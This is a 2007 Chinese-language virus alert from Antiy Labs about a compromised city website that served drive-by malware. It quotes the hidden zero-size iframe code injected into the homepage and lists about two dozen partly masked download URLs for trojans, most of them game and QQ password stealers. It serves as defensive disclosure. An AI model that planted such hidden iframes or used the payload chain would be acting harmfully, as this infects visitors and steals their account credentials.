安全响应·Security
病毒预警·Alarm

城市猎图网站挂马事件

出处:安天实验室 2007-11-14 11:30

内容:
 

  11月14日,安天实验室反病毒监测网发现,城市猎图网站 (www.cityp****.com.cn)
被黑客植入病毒,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载
并运行多个恶意程序。盗取用户敏感信息。
  
  该网站的主页里被插入如下挂马框架代码:

  

  重复的框架代码:
  <iframe src=http://aa.18**.net/ww/new05.htm?075 width=0 height=0>
  </iframe>。
  http://aa.18**.net/ww/new05.htm里被插入框架:
  <iframe src=http://aa.18**.net/aa/xixi.htm width=0 height=0>
  </iframe>
  http://aa.18**.net/aa/xixi.htm为加密网马:

  

  当用户访问www.cityp****.com.cn时,系统会自动隐藏下载以下病毒文件:
  
  http://down.18**.net/bb/014.exe
  病毒名:(Worm.Win32.Downloader.al) 蠕虫下载者木马
  
  一旦运行该木马将下载以下病毒到用户的系统,并运行。
  http://down.18**.net/kl/0.exe
  病毒名:(Trojan-Dropper.Win32.Small.af) 变种木马
  
  http://down.18**.net/kl/1.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hpl) 游戏木马
  
  http://down.18**.net/kl/2.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.cdf) 游戏盗号木马

  http://down.18**.net/kl/3.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hhl) 盗号木马

  http://down.18**.net/kl/4.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hlg) 盗号木马

  http://down.18**.net/kl/5.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hdg) 游戏盗号木马

  http://down.18**.net/kl/6.exe
  病毒名:(Trojan-PSW.Win32.Lmir.bou) 游戏盗号木马

  http://down.18**.net/kl/7.exe
  病毒名:(Trojan-Downloader.Win32.Delf.axx) 下载者木马

  http://down.18**.net/kl/8.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.fhz) 盗号木马

  http://down.18**.net/kl/9.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hhm) 游戏木马

  http://down.18**.net/kl/10.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.guz) 游戏木马

  http://down.18**.net/kl/11.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hhi) 游戏盗号木马

  http://down.18**.net/kl/12.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gyu) 游戏盗号木马

  http://down.18**.net/kl/13.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hkz) 游戏盗号木马

  http://down.18**.net/kl/14.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hde) 游戏盗号木马

  http://down.18**.net/kl/15.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hhc) 游戏木马
  
  http://down.18**.net/kl/16.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hhj) 游戏盗号木马
  
  http://down.18**.net/kl/17.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gxb) 游戏木马
  
  http://down.18**.net/kl/18.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hlb) 游戏木马

  http://down.18**.net/kl/19.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hhk) 游戏木马
  
  http://down.18**.net/kl/20.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hdu) 游戏木马
  
  http://down.18**.net/kl/21.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hlw) 游戏木马

  http://down.18**.net/kl/22.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hle) 游戏木马

  http://down.18**.net/kl/23.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.hls) 游戏木马

  http://down.18**.net/kl/24.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.gti) 游戏木马

  http://down.18**.net/kl/25.exe
  病毒名:(Trojan-PSW.Win32.QQPass.ali) QQ盗号木马
附:
 

点击此处下载木马防线2005+

病毒上报信箱: submit@virusview.net
[TOP]